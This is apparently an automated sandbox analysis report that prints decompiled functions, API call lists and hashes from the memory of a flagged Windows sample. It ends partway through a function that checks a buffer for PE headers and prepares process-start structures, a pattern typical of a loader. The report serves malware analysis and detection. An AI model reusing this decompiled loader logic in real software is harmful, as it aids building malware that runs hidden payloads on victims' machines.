LoadLibraryA.KERNEL32(00000000,00000000,0272CB1C,?,00000000,0272CB3A), ref: 0272CB01

Memory Dump Source

Source File: 00000000.00000002.278297095.0000000002721000.00000020.00001000.00020000.00000000.sdmp, Offset: 02720000, based on PE: true

Associated: 00000000.00000002.278292760.0000000002720000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.278330937.0000000002740000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2720000_SecuriteInfo.jbxd

Similarity

API ID: ErrorLibraryLoadMode
String ID:
API String ID: 2987862817-0
Opcode ID: bc2c11a9fcc1b115f6546be8f88c95e630ee14951e851de5fac45a2203223e5d
Instruction ID: 6ec805a70a90457cc3bf8776f4989705556e6d502eda185232becd196a7ea7d1
Opcode Fuzzy Hash: bc2c11a9fcc1b115f6546be8f88c95e630ee14951e851de5fac45a2203223e5d
Instruction Fuzzy Hash: D2F0A7B0614744BFEB135F76CC6182FBFFDE74EB1075348B9E801A2A50E5385814C960

Uniqueness

Uniqueness Score: -1.00%

Function 02725AA8 Relevance: 1.5, APIs: 1, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02725AA8(void* __eax) {
				char _v272;
				intOrPtr _t14;
				void* _t16;
				intOrPtr _t18;
				CHAR* _t19;

				_t16 = __eax;
				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
					_t3 = _t16 + 4; // 0x2720000
					GetModuleFileNameA( *_t3,  &_v272, 0x105);
					_t14 = E02725D0C(_t19); // executed
					_t18 = _t14;
					 *((intOrPtr*)(_t16 + 0x10)) = _t18;
					if(_t18 == 0) {
						_t5 = _t16 + 4; // 0x2720000
						 *((intOrPtr*)(_t16 + 0x10)) =  *_t5;
					}
				}
				_t7 = _t16 + 0x10; // 0x2720000
				return  *_t7;
			}

0x02725ab0
0x02725ab6
0x02725ac2
0x02725ac6
0x02725acf
0x02725ad4
0x02725ad6
0x02725adb
0x02725add
0x02725ae0
0x02725ae0
0x02725adb
0x02725ae3
0x02725aee

APIs

GetModuleFileNameA.KERNEL32(02720000,?,00000105), ref: 02725AC6

Part of subcall function 02725D0C: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02720000,027407B4), ref: 02725D28
Part of subcall function 02725D0C: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02720000,027407B4), ref: 02725D46
Part of subcall function 02725D0C: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02720000,027407B4), ref: 02725D64
Part of subcall function 02725D0C: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02725D82
Part of subcall function 02725D0C: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02725E11,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02725DCB
Part of subcall function 02725D0C: RegQueryValueExA.ADVAPI32(?,02725F78,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02725E11,?,80000001), ref: 02725DE9
Part of subcall function 02725D0C: RegCloseKey.ADVAPI32(?,02725E18,00000000,?,?,00000000,02725E11,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02725E0B

Memory Dump Source

Source File: 00000000.00000002.278297095.0000000002721000.00000020.00001000.00020000.00000000.sdmp, Offset: 02720000, based on PE: true

Associated: 00000000.00000002.278292760.0000000002720000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.278330937.0000000002740000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2720000_SecuriteInfo.jbxd

Similarity

API ID: Open$FileModuleNameQueryValue$Close
String ID:
API String ID: 2796650324-0
Opcode ID: 47e13ebab32659183f83e9484014392e770a5945ea1bfc9bf7870af31faf625a
Instruction ID: 94ad4c601b07e775a32d7bf6f9f3097f125f4e3728461a1ee160678f14f68501
Opcode Fuzzy Hash: 47e13ebab32659183f83e9484014392e770a5945ea1bfc9bf7870af31faf625a
Instruction Fuzzy Hash: 7EE06D71A002248BCB14DE58C8C5B4777E8AB08750F400A61EC58CF246D3B0D9188BD4

Uniqueness

Uniqueness Score: -1.00%

Function 0272807C Relevance: 1.5, APIs: 1, Instructions: 23
fileCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E0272807C(void* __eax, long __ecx, void* __edx) {
				long _v16;
				int _t4;

				_push(__ecx);
				_t4 = WriteFile(__eax, __edx, __ecx,  &_v16, 0); // executed
				if(_t4 == 0) {
					_v16 = 0xffffffff;
				}
				return _v16;
			}

0x0272807f
0x02728090
0x02728097
0x02728099
0x02728099
0x027280a7

APIs

WriteFile.KERNEL32(?,?,?,?,00000000), ref: 02728090

Memory Dump Source

Source File: 00000000.00000002.278297095.0000000002721000.00000020.00001000.00020000.00000000.sdmp, Offset: 02720000, based on PE: true

Associated: 00000000.00000002.278292760.0000000002720000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.278330937.0000000002740000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2720000_SecuriteInfo.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 245f9e59dba5418514fab60bbf667c473568b506f2f627899943ec5f0ff1d88a
Instruction ID: f24c0fed58ce0b7dc4a7e6f73909b8b41168ac3405416390c0d5cc5dcf077f0a
Opcode Fuzzy Hash: 245f9e59dba5418514fab60bbf667c473568b506f2f627899943ec5f0ff1d88a
Instruction Fuzzy Hash: DBD05B723081107BD224965A5D44EA75BDCCBC9771F10073EF698C7180D7208C0586B1

Uniqueness

Uniqueness Score: -1.00%

Function 027280F8 Relevance: 1.5, APIs: 1, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E027280F8(void* __eax) {
				signed char _t5;

				_t5 = GetFileAttributesA(E02724D64(__eax)); // executed
				if(_t5 == 0xffffffff || (_t5 & 0x00000010) != 0) {
					return 0;
				} else {
					return 1;
				}
			}

0x02728103
0x0272810b
0x02728114
0x02728115
0x02728118
0x02728118

APIs

GetFileAttributesA.KERNEL32(00000000,?,02739493,ScanString,0273E77C,OpenSession,0273E77C,Initialize,0273E77C,ScanBuffer,0273E77C,Initialize,0273E77C,ScanString,0273E77C,OpenSession), ref: 02728103

Memory Dump Source

Source File: 00000000.00000002.278297095.0000000002721000.00000020.00001000.00020000.00000000.sdmp, Offset: 02720000, based on PE: true

Associated: 00000000.00000002.278292760.0000000002720000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.278330937.0000000002740000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2720000_SecuriteInfo.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 05d875a165ab6318e75591e3b3b507158cdf8e538f5dd74396b57b2eb83cc1fd
Instruction ID: f8c1a5e5d6b25802e6135f8d44289d069723c70a8743b512447b40ee18a95dc2
Opcode Fuzzy Hash: 05d875a165ab6318e75591e3b3b507158cdf8e538f5dd74396b57b2eb83cc1fd
Instruction Fuzzy Hash: 67C08CA1301730065A2461BC1CCA04A0288894523C3242B2AE428C22D1D322901F2821

Uniqueness

Uniqueness Score: -1.00%

Function 0272811C Relevance: 1.5, APIs: 1, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0272811C(void* __eax) {
				signed char _t5;

				_t5 = GetFileAttributesA(E02724D64(__eax)); // executed
				if(_t5 == 0xffffffff || (_t5 & 0x00000010) == 0) {
					return 0;
				} else {
					return 1;
				}
			}

0x02728127
0x0272812f
0x02728138
0x02728139
0x0272813c
0x0272813c

APIs

GetFileAttributesA.KERNEL32(00000000,?,0273A7E7,ScanString,0273E77C,OpenSession,0273E77C,ScanBuffer,0273E77C,OpenSession,0273E77C,Initialize,0273E77C,ScanString,0273E77C,OpenSession), ref: 02728127

Memory Dump Source

Source File: 00000000.00000002.278297095.0000000002721000.00000020.00001000.00020000.00000000.sdmp, Offset: 02720000, based on PE: true

Associated: 00000000.00000002.278292760.0000000002720000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.278330937.0000000002740000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2720000_SecuriteInfo.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: e9d998cf470981c214c7ba8a40b8e17bf5f8f5ab6822d4fda8f732f3535ecfa3
Instruction ID: 678aaab5818036b9c97ed132b4c51cd2a43c85a9caa619df6222003d0cc98895
Opcode Fuzzy Hash: e9d998cf470981c214c7ba8a40b8e17bf5f8f5ab6822d4fda8f732f3535ecfa3
Instruction Fuzzy Hash: 73C02BF03017300A5E2065FC6CC824903CD8946279B201F2EF538C21C5D333D02F2832

Uniqueness

Uniqueness Score: -1.00%

Function 0273EC48 Relevance: 1.5, APIs: 1, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0273EC48(int __eax) {
				int _t3;

				_t3 = timeSetEvent(__eax, 0, E0273EC3C, 0, 1); // executed
				 *0x2744b6c = _t3;
				return _t3;
			}

0x0273ec58
0x0273ec5d
0x0273ec63

APIs

timeSetEvent.WINMM(00002710,00000000,0273EC3C,00000000,00000001), ref: 0273EC58

Memory Dump Source

Source File: 00000000.00000002.278297095.0000000002721000.00000020.00001000.00020000.00000000.sdmp, Offset: 02720000, based on PE: true

Associated: 00000000.00000002.278292760.0000000002720000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.278330937.0000000002740000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2720000_SecuriteInfo.jbxd

Similarity

API ID: Eventtime
String ID:
API String ID: 2982266575-0
Opcode ID: 6e23e28f058a53089d5d80afa7ce4b840cf5548554700494fa10b5e4544bad89
Instruction ID: dce270be5f86c8037e5f86ac82e090b902637f038b9a029e20ea0b06ecbf6c1a
Opcode Fuzzy Hash: 6e23e28f058a53089d5d80afa7ce4b840cf5548554700494fa10b5e4544bad89
Instruction Fuzzy Hash: 62C092F57913003BFA13A6A51DD2F2B699DDB98B00F116426FA00EE2C3D2FA4C109A24

Uniqueness

Uniqueness Score: -1.00%

Function 0272CB23 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E0272CB23() {
				int _t4;
				intOrPtr _t7;
				void* _t8;

				_pop(_t7);
				 *[fs:eax] = _t7;
				_push(E0272CB41);
				_t4 = SetErrorMode( *(_t8 - 0xc)); // executed
				return _t4;
			}

0x0272cb25
0x0272cb28
0x0272cb2b
0x0272cb34
0x0272cb39

APIs

SetErrorMode.KERNEL32(?,0272CB41), ref: 0272CB34

Memory Dump Source

Source File: 00000000.00000002.278297095.0000000002721000.00000020.00001000.00020000.00000000.sdmp, Offset: 02720000, based on PE: true

Associated: 00000000.00000002.278292760.0000000002720000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.278330937.0000000002740000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2720000_SecuriteInfo.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 5e40555db82fb87091747c828f29ab4a4a8e42bd88ae91ca91e31c5f6df79dc7
Instruction ID: 1e220d4951e9dd2be9c4259d7b4bb2cd1eb20cd61e94e6adad72974ed568edc9
Opcode Fuzzy Hash: 5e40555db82fb87091747c828f29ab4a4a8e42bd88ae91ca91e31c5f6df79dc7
Instruction Fuzzy Hash: F0B09BB6E0C2105DB71B9794691542C67E8D7C4710391447BE400D7540D93454044514

Uniqueness

Uniqueness Score: -1.00%

Function 0272CB3F Relevance: 1.5, APIs: 1, Instructions: 5
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0272CB3F() {
				int _t3;
				void* _t4;

				_t3 = SetErrorMode( *(_t4 - 0xc)); // executed
				return _t3;
			}

0x0272cb34
0x0272cb39

APIs

SetErrorMode.KERNEL32(?,0272CB41), ref: 0272CB34

Memory Dump Source

Source File: 00000000.00000002.278297095.0000000002721000.00000020.00001000.00020000.00000000.sdmp, Offset: 02720000, based on PE: true

Associated: 00000000.00000002.278292760.0000000002720000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.278330937.0000000002740000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2720000_SecuriteInfo.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 29f3143b9f21cd1f6a7bf33cda2c225a70341c89d61cb57981f0070d52900ebd
Instruction ID: 175120e2e71108130aa16ba2ff481bd0bdcae8e2d8148f781151fb93fe5a2c15
Opcode Fuzzy Hash: 29f3143b9f21cd1f6a7bf33cda2c225a70341c89d61cb57981f0070d52900ebd
Instruction Fuzzy Hash: FBA002B9D14124B6CE17B7E4956886D637D6E583007C1489AE155B3400C93995088A90

Uniqueness

Uniqueness Score: -1.00%

Function 027215FC Relevance: 1.3, APIs: 1, Instructions: 38
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E027215FC(signed int __eax) {
				void* _t4;
				intOrPtr _t7;
				signed int _t8;
				void* _t10;
				void** _t15;
				void* _t17;

				_t8 = __eax;
				E02721590(__eax);
				_t4 = VirtualAlloc(0, 0x140000, 0x1000, 4); // executed
				if(_t4 == 0) {
					 *0x2741718 = 0;
					return 0;
				} else {
					_t15 =  *0x2741704; // 0x4930000
					_t10 = _t4;
					 *_t10 = 0x2741700;
					 *0x2741704 = _t4;
					 *(_t10 + 4) = _t15;
					 *_t15 = _t4;
					_t17 = _t4 + 0x140000;
					 *((intOrPtr*)(_t17 - 4)) = 2;
					 *0x2741718 = 0x13fff0 - _t8;
					_t7 = _t17 - _t8;
					 *0x2741714 = _t7;
					 *(_t7 - 4) = _t8 | 0x00000002;
					return _t7;
				}
			}

0x027215fd
0x027215ff
0x02721612
0x02721619
0x0272166a
0x02721672
0x0272161b
0x0272161b
0x02721621
0x02721623
0x02721629
0x0272162e
0x02721631
0x02721635
0x02721640
0x0272164d
0x02721655
0x02721657
0x02721664
0x02721667
0x02721667

APIs

VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,02721A33), ref: 02721612

Memory Dump Source

Source File: 00000000.00000002.278297095.0000000002721000.00000020.00001000.00020000.00000000.sdmp, Offset: 02720000, based on PE: true

Associated: 00000000.00000002.278292760.0000000002720000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.278330937.0000000002740000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2720000_SecuriteInfo.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 1ac61ed5ef54115f84e3543d1adf97e9dbe0b8c469f33531ace0cf7fd83771bc
Instruction ID: 20d51a3423f33993c5c97a2d497ca8f7cfb3f1e636c8478ae9ed5d35d545a2dc
Opcode Fuzzy Hash: 1ac61ed5ef54115f84e3543d1adf97e9dbe0b8c469f33531ace0cf7fd83771bc
Instruction Fuzzy Hash: 4AF03CF0B813018BDB06EF799A84B026AD6E789345FA0847AD20DDB385E77584458B40

Uniqueness

Uniqueness Score: -1.00%

Function 027216B2 Relevance: 1.3, APIs: 1, Instructions: 36
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E027216B2(intOrPtr __eax) {
				void* _t6;
				void** _t9;
				void* _t11;
				void* _t15;
				long _t20;
				intOrPtr _t24;

				_t24 = __eax;
				_t20 = __eax + 0x00010010 - 0x00000001 + 0x00000004 & 0xffff0000;
				_t6 = VirtualAlloc(0, _t20, 0x101000, 4); // executed
				_t11 = _t6;
				if(_t11 != 0) {
					_t15 = _t11;
					 *((intOrPtr*)(_t15 + 8)) = _t24;
					 *(_t15 + 0xc) = _t20 | 0x00000004;
					E02721674();
					_t9 =  *0x27437a8; // 0x7f9e0000
					 *_t15 = 0x27437a4;
					 *0x27437a8 = _t11;
					 *(_t15 + 4) = _t9;
					 *_t9 = _t11;
					 *0x27437a0 = 0;
					_t11 = _t11 + 0x10;
				}
				return _t11;
			}

0x027216b8
0x027216c4
0x027216d4
0x027216d9
0x027216dd
0x027216df
0x027216e1
0x027216e7
0x027216ea
0x027216ef
0x027216f4
0x027216fa
0x02721700
0x02721703
0x02721705
0x0272170c
0x0272170c
0x02721715

APIs

VirtualAlloc.KERNEL32(00000000,?,00101000,00000004), ref: 027216D4

Memory Dump Source

Source File: 00000000.00000002.278297095.0000000002721000.00000020.00001000.00020000.00000000.sdmp, Offset: 02720000, based on PE: true

Associated: 00000000.00000002.278292760.0000000002720000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.278330937.0000000002740000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2720000_SecuriteInfo.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: a00ca58e6aad52043fa248010e00426d70f1af1a83fdcdefa39a9a97efe4c4ff
Instruction ID: 858adee4b1b5b1623658e5804b08eca58c9da16367f14edc6ade9047d209db94
Opcode Fuzzy Hash: a00ca58e6aad52043fa248010e00426d70f1af1a83fdcdefa39a9a97efe4c4ff
Instruction Fuzzy Hash: F2F0CDF6A406A27BD712AE499C80B82BBD0FB00320F61417AE94C97340C770A800CB90

Uniqueness

Uniqueness Score: -1.00%

Function 02721716 Relevance: 1.3, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02721716(void* __eax) {
				void* _t5;
				signed int _t6;
				signed int _t7;
				void* _t10;
				void* _t13;
				void _t16;

				_t10 = __eax - 0x10;
				E02721674();
				_t5 = _t10;
				_t16 =  *_t5;
				_t13 =  *(_t5 + 4);
				_t6 = VirtualFree(_t10, 0, 0x8000); // executed
				if(_t6 == 0) {
					_t7 = _t6 | 0xffffffff;
				} else {
					 *_t13 = _t16;
					 *(_t16 + 4) = _t13;
					_t7 = 0;
				}
				 *0x27437a0 = 0;
				return _t7;
			}

0x0272171d
0x02721720
0x02721725
0x02721727
0x02721729
0x02721734
0x0272173b
0x02721746
0x0272173d
0x0272173d
0x0272173f
0x02721742
0x02721742
0x02721749
0x02721753

APIs

VirtualFree.KERNEL32(?,00000000,00008000), ref: 02721734

Memory Dump Source

Source File: 00000000.00000002.278297095.0000000002721000.00000020.00001000.00020000.00000000.sdmp, Offset: 02720000, based on PE: true

Associated: 00000000.00000002.278292760.0000000002720000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.278330937.0000000002740000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2720000_SecuriteInfo.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 15556ad539ebe60599b1a3ba576a78c95a87b634eb8010eaa1007197b8e35b0d
Instruction ID: e2c830023a635f932f5cc8d58994a2725834ffc59a24a93794d6cef2f42034d3
Opcode Fuzzy Hash: 15556ad539ebe60599b1a3ba576a78c95a87b634eb8010eaa1007197b8e35b0d
Instruction Fuzzy Hash: D2E086753003225FD7115ABA5D84B167BDCFB89650F544476F549DB252D760E8088B60

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 027354F4 Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 99
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E027354F4() {

				if( *0x274448c == 0) {
					 *0x274448c = GetModuleHandleA("kernel32.dll");
					if( *0x274448c != 0) {
						 *0x2744490 = GetProcAddress( *0x274448c, "CreateToolhelp32Snapshot");
						 *0x2744494 = GetProcAddress( *0x274448c, "Heap32ListFirst");
						 *0x2744498 = GetProcAddress( *0x274448c, "Heap32ListNext");
						 *0x274449c = GetProcAddress( *0x274448c, "Heap32First");
						 *0x27444a0 = GetProcAddress( *0x274448c, "Heap32Next");
						 *0x27444a4 = GetProcAddress( *0x274448c, "Toolhelp32ReadProcessMemory");
						 *0x27444a8 = GetProcAddress( *0x274448c, "Process32First");
						 *0x27444ac = GetProcAddress( *0x274448c, "Process32Next");
						 *0x27444b0 = GetProcAddress( *0x274448c, "Process32FirstW");
						 *0x27444b4 = GetProcAddress( *0x274448c, "Process32NextW");
						 *0x27444b8 = GetProcAddress( *0x274448c, "Thread32First");
						 *0x27444bc = GetProcAddress( *0x274448c, "Thread32Next");
						 *0x27444c0 = GetProcAddress( *0x274448c, "Module32First");
						 *0x27444c4 = GetProcAddress( *0x274448c, "Module32Next");
						 *0x27444c8 = GetProcAddress( *0x274448c, "Module32FirstW");
						 *0x27444cc = GetProcAddress( *0x274448c, "Module32NextW");
					}
				}
				if( *0x274448c == 0 ||  *0x2744490 == 0) {
					return 0;
				} else {
					return 1;
				}
			}

0x027354fd
0x0273550d
0x02735512
0x02735525
0x02735537
0x02735549
0x0273555b
0x0273556d
0x0273557f
0x02735591
0x027355a3
0x027355b5
0x027355c7
0x027355d9
0x027355eb
0x027355fd
0x0273560f
0x02735621
0x02735633
0x02735633
0x02735512
0x0273563b
0x02735649
0x0273564a
0x0273564d
0x0273564d

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,00000002,0273577B,?,?,0273580D,00000000,027358E9), ref: 02735508
GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02735520
GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02735532
GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02735544
GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02735556
GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02735568
GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 0273557A
GetProcAddress.KERNEL32(00000000,Process32First), ref: 0273558C
GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0273559E
GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 027355B0
GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 027355C2
GetProcAddress.KERNEL32(00000000,Thread32First), ref: 027355D4
GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 027355E6
GetProcAddress.KERNEL32(00000000,Module32First), ref: 027355F8
GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0273560A
GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 0273561C
GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 0273562E

Strings

Heap32ListNext, xrefs: 0273553C
Thread32Next, xrefs: 027355DE
CreateToolhelp32Snapshot, xrefs: 02735518
Process32First, xrefs: 02735584
kernel32.dll, xrefs: 02735503
Process32NextW, xrefs: 027355BA
Module32FirstW, xrefs: 02735614
Heap32ListFirst, xrefs: 0273552A
Process32FirstW, xrefs: 027355A8
Process32Next, xrefs: 02735596
Toolhelp32ReadProcessMemory, xrefs: 02735572
Heap32First, xrefs: 0273554E
Thread32First, xrefs: 027355CC
Module32First, xrefs: 027355F0
Module32Next, xrefs: 02735602
Heap32Next, xrefs: 02735560
Module32NextW, xrefs: 02735626

Memory Dump Source

Source File: 00000000.00000002.278297095.0000000002721000.00000020.00001000.00020000.00000000.sdmp, Offset: 02720000, based on PE: true

Associated: 00000000.00000002.278292760.0000000002720000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.278330937.0000000002740000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2720000_SecuriteInfo.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
API String ID: 667068680-597814768
Opcode ID: 4057785d44ef14cb9287e957c9e2ad61cc30f830bfc769380039a4a9e168ff72
Instruction ID: 0d791b09d8a96cea307a84a4391daefdec6bc3aae33eefeacc2372dee5662dd0
Opcode Fuzzy Hash: 4057785d44ef14cb9287e957c9e2ad61cc30f830bfc769380039a4a9e168ff72
Instruction Fuzzy Hash: 0B311CF4A90724EFFF12AFB8D989B293BE9EB0A7107C0496AE051EF205C77484149F11

Uniqueness

Uniqueness Score: -1.00%

Function 02733990 Relevance: 32.2, APIs: 13, Strings: 5, Instructions: 658
memorynativethreadCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E02733990(intOrPtr __eax, void* __ebx, intOrPtr __edx, void* __esi, void* __fp0) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v40;
				char _v44;
				intOrPtr _v48;
				char _v52;
				char _v56;
				char _v60;
				intOrPtr _v64;
				char _v68;
				char _v72;
				char _v76;
				intOrPtr _v80;
				char _v84;
				char _v88;
				char _v92;
				intOrPtr _v96;
				char _v100;
				char _v104;
				char _v108;
				intOrPtr _v112;
				char _v116;
				char _v120;
				char _v124;
				intOrPtr _v128;
				char _v132;
				char _v136;
				char _v140;
				intOrPtr _v144;
				char _v148;
				char _v152;
				char _v156;
				intOrPtr _v160;
				char _v164;
				char _v168;
				char _v172;
				intOrPtr _v176;
				char _v180;
				char _v184;
				char _v188;
				intOrPtr _v192;
				char _v196;
				char _v200;
				char _v204;
				intOrPtr _v208;
				char _v212;
				char _v216;
				char _v220;
				char _v224;
				intOrPtr _v228;
				char _v232;
				char _v236;
				char _v240;
				intOrPtr _v244;
				char _v248;
				char _v252;
				char _v256;
				intOrPtr _v260;
				char _v264;
				char _v268;
				char _v272;
				intOrPtr _v276;
				char _v280;
				char _v284;
				void* _t164;
				short* _t181;
				intOrPtr _t186;
				intOrPtr* _t189;
				void* _t225;
				intOrPtr _t255;
				void* _t257;
				intOrPtr _t259;
				intOrPtr _t261;
				intOrPtr _t263;
				void* _t265;
				intOrPtr _t269;
				struct HINSTANCE__* _t303;
				struct HINSTANCE__* _t305;
				intOrPtr _t307;
				PVOID* _t309;
				void* _t310;
				long* _t312;
				intOrPtr _t313;
				PVOID* _t315;
				void* _t316;
				intOrPtr _t318;
				void* _t349;
				void* _t379;
				intOrPtr _t412;
				intOrPtr _t413;
				intOrPtr _t415;
				intOrPtr _t445;
				intOrPtr _t477;
				void* _t479;
				intOrPtr _t481;
				void* _t483;
				intOrPtr _t485;
				intOrPtr _t487;
				void* _t489;
				intOrPtr _t494;
				void* _t495;
				void* _t496;
				intOrPtr _t497;
				intOrPtr _t502;
				intOrPtr _t503;
				intOrPtr _t504;
				intOrPtr _t505;
				intOrPtr _t506;
				intOrPtr _t507;
				intOrPtr _t508;
				intOrPtr _t509;
				intOrPtr _t510;
				intOrPtr _t511;
				intOrPtr _t512;
				intOrPtr _t513;
				intOrPtr _t514;
				intOrPtr _t515;
				intOrPtr _t517;
				intOrPtr _t518;
				void* _t525;
				intOrPtr _t526;
				void* _t535;
				void* _t540;
				void* _t545;
				void* _t550;
				void* _t555;
				void* _t560;
				void* _t567;
				void* _t572;
				void* _t577;
				void* _t582;
				void* _t588;
				void* _t593;
				PVOID* _t594;
				PVOID* _t596;
				void* _t601;
				void* _t606;
				intOrPtr _t608;
				void* _t613;
				void* _t618;
				intOrPtr _t624;
				intOrPtr _t625;
				void* _t634;
				void* _t637;
				void* _t641;

				_t641 = __fp0;
				_t620 = __esi;
				_t624 = _t625;
				_t496 = 0x23;
				do {
					_push(0);
					_push(0);
					_t496 = _t496 - 1;
				} while (_t496 != 0);
				_push(__ebx);
				_push(__esi);
				_t494 = __edx;
				_v8 = __eax;
				E02724D54(_v8);
				_push(_t624);
				_push(0x273442b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t625;
				_t164 = E0272304C(0x270e);
				_push(_t164);
				L02733780();
				if(_t164 == 0) {
					E027248F4(0x2744438, 0x2734454);
				} else {
					E027248F4(0x2744438, 0x2734444);
				}
				_push(0x2734460);
				_push( *0x2744438);
				_push("OpenSession");
				E02724C24();
				E02724A98( &_v12, E02724D64(_v16));
				_push(_v12);
				_t497 =  *0x2744438; // 0x0
				E02724BB0( &_v24, _t497, 0x2734460);
				E02724A98( &_v20, E02724D64(_v24));
				_pop(_t525);
				E02733690(_v20, _t494, _t525, _t620);
				 *0x2744420 = _t494;
				_t181 =  *0x2744420; // 0x0
				if( *_t181 == 0x5a4d) {
					_push(0);
					_push(_t494);
					_t186 =  *0x2744420; // 0x0
					asm("cdq");
					asm("adc edx, [esp+0x4]");
					 *0x2744424 =  *((intOrPtr*)(_t186 + 0x3c)) + _v56;
					_t189 =  *0x2744424; // 0x0
					if( *_t189 == 0x4550) {
						E02723518(0x2744310, 0x44);
						E02723518(0x2744300, 0x10);
						0x2744310->cb = 0x44;
						_push(0x2734460);
						_push( *0x2744438);
						_push("ScanBuffer");
						E02724C24();
						E02724A98( &_v28, E02724D64(_v32));
						_push(_v28);
						_t502 =  *0x2744438; // 0x0
						E02724BB0( &_v40, _t502, 0x2734460);
						E02724A98( &_v36, E02724D64(_v40));
						_pop(_t535);
